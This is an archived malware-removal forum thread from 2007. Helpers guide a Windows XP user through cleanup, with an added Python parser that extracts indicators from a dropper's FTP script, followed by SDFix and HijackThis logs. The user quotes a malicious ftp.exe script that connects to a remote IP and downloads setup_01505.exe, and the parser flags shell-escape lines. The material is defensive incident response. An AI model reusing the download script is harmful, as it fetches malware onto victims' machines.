Resolved HJT Threads Resolved spyware and popup issues.
Old 03-19-2007, 09:42 AM   #61
Ried, Assistant Manager, TSF Academy; Moderator/Analyst Security Team
Join Date: Jan 2005
Location: Ohio
Posts: 26,557
OS: WinXP and Vista
Re: MS Windows XP will not load when connected to internet

Quote:
C:\WINDOWS\System32\3718845C.exe
C:\WINDOWS\system32\i
**** This was a file ****
** Contents
I can not find, looks like it was deleted
It did contain an IP address **
Which one contained an IP address?
Member of ASAP since 2005
Member of UNITE since 2006
"It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."
Old 03-19-2007, 07:32 PM   #62
cul8rman, Registered User
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP

Quote:
Which one contained an IP address?

It was in C:\WINDOWS\system32\i

I tried searching for it and it is back. Here are the contents of "I"

open 130.13.166.123 27067
user 1 1
get setup_01505.exe
quit


Maybe it is not an IP address, but to me it looked like one. I am surprised that the file is back; I deleted it and did not find it yesterday.
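The four lines cul8rman posted are a command script for the Windows ftp.exe client, the kind a dropper feeds it with `ftp -s:<file>`: connect to 130.13.166.123 on port 27067 (not the FTP default of 21), log in as user "1" with password "1", fetch setup_01505.exe, disconnect. The fetched name matches the setup_NNNNN.exe files that turn up in System32 later in the thread, and the script coming back after deletion means something else on the box re-writes it, so the script is a symptom rather than the infection. The parser below is an added example written for this page, not code from the thread or from any of the tools used in it; it pulls the indicators out of such a script, answers the "is that an IP address?" question properly, and also catches the `!command` form, which ftp.exe hands to a local shell. The sample input is the script as posted; the hostname and the `!start` line in the test are constructed.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import List, Optional

# The four lines cul8rman posted as the contents of C:\WINDOWS\system32\i.
SCRIPT_FROM_THREAD = """open 130.13.166.123 27067
user 1 1
get setup_01505.exe
quit
"""


@dataclass
class FtpScriptIocs:
    host: Optional[str] = None
    port: int = 21                                   # ftp.exe default when "open" names no port
    username: Optional[str] = None
    password: Optional[str] = None
    downloads: List[str] = field(default_factory=list)       # files pulled with get/recv/mget
    shell_commands: List[str] = field(default_factory=list)  # "!cmd" lines ftp.exe passes to a shell
    verbs: List[str] = field(default_factory=list)


def parse_ftp_script(text: str) -> FtpScriptIocs:
    """Parse a script of the form ftp.exe consumes via 'ftp -s:<file>'."""
    iocs = FtpScriptIocs()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("!"):                     # "!" escapes to a local shell command
            iocs.shell_commands.append(line[1:].strip())
            iocs.verbs.append("!")
            continue
        parts = line.split()
        verb = parts[0].lower()
        iocs.verbs.append(verb)
        if verb == "open" and len(parts) >= 2:
            iocs.host = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                iocs.port = int(parts[2])
        elif verb == "user" and len(parts) >= 2:     # "user <name> [password]"
            iocs.username = parts[1]
            iocs.password = parts[2] if len(parts) >= 3 else None
        elif verb in ("get", "recv", "mget") and len(parts) >= 2:
            iocs.downloads.extend(parts[1:])
    return iocs


def host_kind(host: str) -> str:
    """'ipv4', 'ipv6' or 'hostname': a literal answer to "is that an IP address?"."""
    try:
        return "ipv%d" % ipaddress.ip_address(host).version
    except ValueError:
        return "hostname"


def is_ftp_downloader(iocs: FtpScriptIocs) -> bool:
    """A script that opens a server and pulls at least one file is a download stage."""
    return iocs.host is not None and bool(iocs.downloads)


def summarize(iocs: FtpScriptIocs) -> List[str]:
    """Indicator lines suitable for pasting into a cleanup thread or a blocklist ticket."""
    out = []
    if iocs.host:
        out.append(f"server: {iocs.host}:{iocs.port} ({host_kind(iocs.host)}"
                   + (", non-standard port" if iocs.port != 21 else "") + ")")
    if iocs.username is not None:
        out.append(f"credentials: {iocs.username}/{iocs.password}")
    for name in iocs.downloads:
        out.append(f"download: {name}")
    for cmd in iocs.shell_commands:
        out.append(f"shell escape: {cmd}")
    return out


if __name__ == "__main__":
    for line in summarize(parse_ftp_script(SCRIPT_FROM_THREAD)):
        print(line)
```

The indicators worth keeping from this script are the server, the odd port and the fetched file name; the credentials are throwaway. Treat the address as evidence for this cleanup only, not as a blocklist entry to rely on years later.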
Old 03-19-2007, 08:04 PM   #63
Ried

Yes, that is an IP address--good eye.

Have you followed my instructions just before I inquired about that file and IP address?
Old 03-19-2007, 10:16 PM   #64
cul8rman

Contents of Report.txt
*********************

SDFix: Version 1.69

Run by Duane - Mon 03/19/2007 @ 20:36:04.07

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\Documents and Settings\Duane\Desktop\SDFix

Safe Mode:
Checking Services:





Restoring Windows Registry Entries
Restoring Default Hosts File


Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\setup_01505.exe - Deleted
C:\WINDOWS\system32\setup_03755.exe - Deleted
C:\WINDOWS\system32\setup_10548.exe - Deleted
C:\WINDOWS\system32\setup_42102.exe - Deleted



ADS Check:

C:\WINDOWS\system32
No streams found.


Final Check:

Remaining Services:
------------------



Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"


Remaining Files:
---------------

Backups Folder: - C:\DOCUME~1\Duane\Desktop\SDFix\backups\backups.zip


Checking For Files with Hidden Attributes :

C:\Program Files\Common Files\aolshare\shell\us\shellext.dll
C:\Program Files\Common Files\csshare\shell\us\shellext.dll
C:\My Games\Action Ball\actionball.exe
C:\My Games\Adventure Ball\AdventureBall.exe
C:\My Games\Aqua Pearls\pearls.exe
C:\My Games\Cactus Bruce and the Corporate Monkeys\RealCB12.exe
C:\My Games\Clash 'N Slash\Clash N Slash.exe
C:\My Games\Flying Leo\FlyingLeo.exe
C:\My Games\Icy Spell\IcySpell.exe
C:\My Games\Impact\Impact.exe
C:\My Games\Inspheration\Inspheration.exe
C:\My Games\Jewel of Atlantis\Jewel of Atlantis.exe
C:\My Games\Mirror Magic\mirrormagic.exe
C:\My Games\Mosaic - Tomb of Mystery\Mosaic.exe
C:\My Games\Phlinx to Go\PhlinxToGo.exe
C:\My Games\Rainbow Web\RainbowWeb.exe
C:\My Games\Snowy - Space Trip\SpaceTrip.exe
C:\My Games\Turtle Odyssey\Game.exe
C:\My Games\Wheel of Fortune\Wheel of Fortune.exe
C:\Program Files\America Online 8.0\aolphx.exe
C:\Program Files\America Online 8.0\aoltray.exe
C:\Program Files\America Online 8.0\RBM.exe
C:\Program Files\America Online 8.0\waol.exe
C:\Program Files\America Online 8.0\COMIT\cswitch.exe
C:\Program Files\CompuServe 7.0\csphx.exe
C:\Program Files\CompuServe 7.0\cstray.exe
C:\Program Files\CompuServe 7.0\RBM.exe
C:\Program Files\CompuServe 7.0\wcs2000.exe
C:\Program Files\CompuServe 7.0\COMIT\cswitch.exe
C:\Program Files\Picasa2\setup.exe
C:\WINDOWS\system32\config\system.tmp.LOG

Add/Remove Programs List:

1Click DVD Copy 4.2.9.2
3D Snowy Cottage Screen Saver
Ad-Aware SE Personal
Adobe Acrobat 4.0
Agfa ePhoto CL18 Digital Camera Driver
America Online
AOL Instant Messenger (SM)
AOL Coach Version 1.0(Build:20020823.1)
AVG 7.5
AVG Anti-Spyware 7.5
BadCopy Pro
Belarc Advisor 7.0
BigFix
Calm Before the Storm Screen Saver
Chess Live 4.2
Cinema Tycoon(TM) Gold
CleanUp!
Conexant SoftK56 Modem(M)
CompuServe
Codec Pack - All In 1 6.0.2.7
Cox Online Support Controls
EPSON Printer Software
EZBack-it-up 2.0.1
Fiber Twig 2: Restoration of Magic Garden
Fish Tycoon
Fortune Tiles(TM) Gold
FREE Hi-Q Recorder 1.9
Gem Shop
Google Desktop Search
Gum Droppers
Hexalot
High Flying Act - Interactive Storybook
HijackThis 1.99.1
ICQ
iTunes
Karu
Microsoft Data Access Components KB870669
Lavasoft VX2 Cleaner
LEGO Chess
Macromedia Shockwave Player
CloneDVD 4.0
Micro Innovations Wireless Keyboard
Micro Innovations Wireless Optical Mouse
Mozilla Firefox (2.0.0.2)
MSN Music Assistant
Netscape 6 (6.2.1)
Panda ActiveScan
PC Pitstop Optimize 1.5
Picasa 2
QuickTime
Reader Rabbit 1st Grade
Reader Rabbit 1st Grade(R) Capers on Cloud Nine!(TM)
Reader Rabbit Thinking Adventures Ages 4-6
Reader Rabbit(R) I Can Read! With Phonics
RealArcade
RealPlayer
RegistryFix v3.0
Reader Rabbit's 2nd Grade
Sandlot Games Client Services
Macromedia Flash Player 8
SimCity 3000
Splash
Spybot - Search & Destroy 1.4
IncBack +
SurferNETWORK Player
SyncBackSE
Viewpoint Media Player (Remove Only)
WeatherBug
Winamp (remove only)
Yahoo! Toolbar
Yahoo! Toolbar
Zulu Gems
Microsoft Money 2003
Microsoft Money 2003 System Pack
PC Inspector File Recovery
The Sims Deluxe Edition
Norton WMI Update
Google Toolbar for Internet Explorer
Java(TM) SE Runtime Environment 6
DataRobot Premium
Stomp Backup MyPC
MaxBlast 4
PowerDVD
Windows Backup Utility
EPSON Web-To-Page
Mirror Magic
NetZero For Riverdeep
iTunes
Intel(R) Extreme Graphics Driver
Microsoft Office Excel Viewer 2003
Microsoft Office Word Viewer 2003
Adobe Reader 7.0.7
DV 4100M
HP Software Update
Ulead Photo Express 4.0 SE
Texas Hold 'Em: High Stakes Poker
Ulead Photo Explorer 8.0 SE Basic
Disney's Phonics Quest
Greeting Card Factory Express
Sygate Personal Firewall
Microsoft Works 6.0
HP Deskjet 3740
Realtek AC'97 Audio
Multimedia Keyboard Driver

Finished
*********************
I found one, it is dated today and is named
Setup_63032.exe
File size 0
**************************

I will leave the system running

**************************
Old 03-19-2007, 10:31 PM   #65
Ried

Ok, while it's still up--run a new scan with ComboScan.exe (not combofix.exe) and post the log here. Do not reboot.
Old 03-19-2007, 11:06 PM   #66
cul8rman

ComboScan v20070306.20 run by Duane on 2007-03-19 at 21:58:40
Computer is in Normal Mode.
--------------------------------------------------------------------------------



-- HijackThis (run as Duane.exe) -----------------------------------------------

HijackThis failed to provide a log after three minutes; running clone instead.
-- HijackThis Clone ------------------------------------------------------------

Emulating logfile of HijackThis v1.99.1
Scan saved at 2007-03-19 22:01:40
Platform: Windows XP Service Pack 1 (5.01.2600)
MSIE: Internet Explorer (6.0.2800.1106)

Running processes:
C:\WINDOWS\system32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Grisoft\AVG7\avgamsvr.exe
C:\Program Files\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\ftp.exe
C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\monitor.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb10.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hewlett-Packard\HP Software Update\hpwuSchd2.exe
C:\Program Files\Picasa2\PicasaMediaDetector.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Grisoft\AVG7\avgcc.exe
C:\Program Files\Micro Innovations\Keyboard\KBDAP32A.EXE
C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Java\jre1.6.0\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\BigFix\BigFix.exe
C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe
C:\Documents and Settings\Duane\Desktop\comboscan.exe
C:\Program Files\Hijack This\Duane.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.emachines.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\GoogleToolbar3.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\system32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\GoogleToolbar3.dll
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [OFFICEKB] C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE
O4 - HKLM\..\Run: [FLMOFFICE4DMOUSE] C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
O4 - HKLM\..\Run: [PC Pitstop Optimize Scheduler] C:\Program Files\PCPitstop\Optimize\PCPOptimize.exe -boot
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe"
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Microsoft Works Update Detection] c:\Program Files\Microsoft Works\WkDetect.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: BigFix.lnk = C:\Program Files\BigFix\BigFix.exe
O4 - Global Startup: Ulead Photo Express 4.0 SE Calendar Checker .lnk = C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\Icq.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\Icq.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (file missing)
O9 - Extra 'Tools' menuitem: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (file missing)
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll
O9 - Extra 'Tools' menuitem: (no name) - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: Video Poker () - http://download.games.yahoo.com/game...s/y/vpt0_x.cab
O16 - DPF: Yahoo! Backgammon () - http://download.games.yahoo.com/game...ts/y/at1_x.cab
O16 - DPF: Yahoo! Bingo () - http://download.games.yahoo.com/game...ts/y/xt0_x.cab
O16 - DPF: Yahoo! Blackjack () - http://download.games.yahoo.com/game...ts/y/jt0_x.cab
O16 - DPF: Yahoo! Checkers () - http://download.games.yahoo.com/game...ts/y/kt4_x.cab
O16 - DPF: Yahoo! Chess () - http://download.games.yahoo.com/game...ts/y/ct2_x.cab
O16 - DPF: Yahoo! Cribbage () - http://download.games.yahoo.com/game...ts/y/it1_x.cab
O16 - DPF: Yahoo! Dice () - http://download.games.yahoo.com/game...s/y/dct4_x.cab
O16 - DPF: Yahoo! Go Fish () - http://download.games.yahoo.com/game...ts/y/zt3_x.cab
O16 - DPF: Yahoo! Klondike Solitaire () - http://presence.games.yahoo.com/yog/y/ks12_x.cab
O16 - DPF: Yahoo! Poker () - http://download.games.yahoo.com/game...ts/y/pt3_x.cab
O16 - DPF: Yahoo! Pyramids () - http://download.games.yahoo.com/game...s/y/pyt1_x.cab
O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71} () - http://download.microsoft.com/downlo...367/wmavax.CAB
O16 - DPF: {01113300-3E00-11D2-8470-0060089874ED} (Support.com Configuration Class) - http://support.cox.com/sdccommon/download/tgctlcm.cab
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://active.macromedia.com/director/cabs/sw.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} () - http://download.microsoft.com/downlo...22/wmv9VCM.CAB
O16 - DPF: {4620BC29-8B8E-4F4E-9D92-1DB6633D6793} (SurferNETWORK Plugin) - http://rd1.surfernetwork.com/surferplugin.ocx
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} () - http://software-dl.real.com/14939218...p/RdxIE601.cab
O16 - DPF: {62789780-B744-11D0-986B-00609731A21D} (Autodesk MapGuide ActiveX Control) - http://maricopa.gov/assessor/gis/plugin/mgaxctrl.cab
O16 - DPF: {7FE26BE2-B923-4B41-9834-E84DA1CC1F96} (Maid Control) - http://vsp.closetmaid.com/vsp/cmaidc...downloader.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab
O16 - DPF: {CC05BC12-2AA2-4AC7-AC81-0E40F83B1ADF} (Live365Player Class) - http://www.live365.com/players/play365.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/get...nt/swflash.cab
O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} (TikGames Online Control) - http://download.games.yahoo.com/game.../gpcontrol.cab
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/game...ploader_v6.cab
O18 - Protocol: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files\Belarc\Advisor\System\BAVoilaX.dll
O18 - Protocol: cetihpz - {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\System32\igfxsrvc.dll
O23 - Service: Alerter - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Application Layer Gateway Service (ALG) - C:\WINDOWS\system32\alg.exe
O23 - Service: Application Management (AppMgmt) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Windows Audio (AudioSrv) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: AVG Anti-Spyware Guard - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - C:\Program Files\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - C:\Program Files\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - C:\Program Files\Grisoft\AVG7\avgemc.exe
O23 - Service: Background Intelligent Transfer Service (BITS) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Computer Browser (Browser) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Indexing Service (CiSvc) - C:\WINDOWS\system32\cisvc.exe
O23 - Service: ClipBook (ClipSrv) - C:\WINDOWS\system32\clipsrv.exe
O23 - Service: COM+ System Application (COMSysApp) - C:\WINDOWS\System32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
O23 - Service: Cryptographic Services (CryptSvc) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: DHCP Client (Dhcp) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - C:\WINDOWS\System32\dmadmin.exe /com
O23 - Service: Logical Disk Manager (dmserver) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: DNS Client (Dnscache) - C:\WINDOWS\System32\svchost.exe -k NetworkService
O23 - Service: Error Reporting Service (ERSvc) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Event Log (Eventlog) - C:\WINDOWS\system32\services.exe
O23 - Service: COM+ Event System (EventSystem) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Fast User Switching Compatibility (FastUserSwitchingCompatibility) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Google Updater Service (gusvc) - "C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe"
O23 - Service: Help and Support (helpsvc) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Human Interface Device Access (HidServ) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: InstallDriver Table Manager (IDriverT) - "C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe"
O23 - Service: IMAPI CD-Burning COM Service (ImapiService) - C:\WINDOWS\system32\imapi.exe
O23 - Service: iPodService - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Server (lanmanserver) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Workstation (lanmanworkstation) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: TCP/IP NetBIOS Helper (LmHosts) - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Messenger - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: NetMeeting Remote Desktop Sharing (mnmsrvc) - C:\WINDOWS\system32\mnmsrvc.exe
O23 - Service: Distributed Transaction Coordinator (MSDTC) - C:\WINDOWS\system32\msdtc.exe
O23 - Service: Windows Installer (MSIServer) - C:\WINDOWS\System32\msiexec.exe /V
O23 - Service: Network DDE (NetDDE) - C:\WINDOWS\system32\netdde.exe
O23 - Service: Network DDE DSDM (NetDDEdsdm) - C:\WINDOWS\system32\netdde.exe
O23 - Service: Net Logon (Netlogon) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Network Connections (Netman) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Network Location Awareness (NLA) (Nla) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: NT LM Security Support Provider (NtLmSsp) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Removable Storage (NtmsSvc) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Office Source Engine (ose) - "C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
O23 - Service: Plug and Play (PlugPlay) - C:\WINDOWS\system32\services.exe
O23 - Service: IPSEC Services (PolicyAgent) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Protected Storage (ProtectedStorage) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Remote Access Auto Connection Manager (RasAuto) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Remote Access Connection Manager (RasMan) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Remote Desktop Help Session Manager (RDSessMgr) - C:\WINDOWS\system32\sessmgr.exe
O23 - Service: Routing and Remote Access (RemoteAccess) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Remote Procedure Call (RPC) Locator (RpcLocator) - C:\WINDOWS\system32\locator.exe
O23 - Service: Remote Procedure Call (RPC) (RpcSs) - C:\WINDOWS\system32\svchost -k rpcss
O23 - Service: QoS RSVP (RSVP) - C:\WINDOWS\system32\rsvp.exe
O23 - Service: Security Accounts Manager (SamSs) - C:\WINDOWS\system32\lsass.exe
O23 - Service: Smart Card Helper (SCardDrv) - C:\WINDOWS\system32\scardsvr.exe
O23 - Service: Smart Card (SCardSvr) - C:\WINDOWS\system32\scardsvr.exe
O23 - Service: Task Scheduler (Schedule) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Secondary Logon (seclogon) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: System Event Notification (SENS) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Windows Firewall/Internet Connection Sharing (ICS) (SharedAccess) - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Shell Hardware Detection (ShellHWDetection) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: Sygate Personal Firewall (SmcService) - C:\Program Files\Sygate\SPF\Smc.exe
O23 - Service: Print Spooler (Spooler) - C:\WINDOWS\system32\spoolsv.exe
O23 - Service: System Restore Service (srservice) - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: SSDP Discovery Service (SSDPSRV) - C:\WINDOWS\System32\svchost.exe -k LocalService
O23 - Service: Windows Image Acquisition (WIA) (stisvc) - C:\WINDOWS\System32\svchost.exe -k imgsvc
O23 - Service: MS Software Shadow Copy Provider (SwPrv) - C:\WINDOWS\System32\dllhost.exe /Processid:{195E6122-CAE8-4FC9-BD96-F81BBD1135E2}
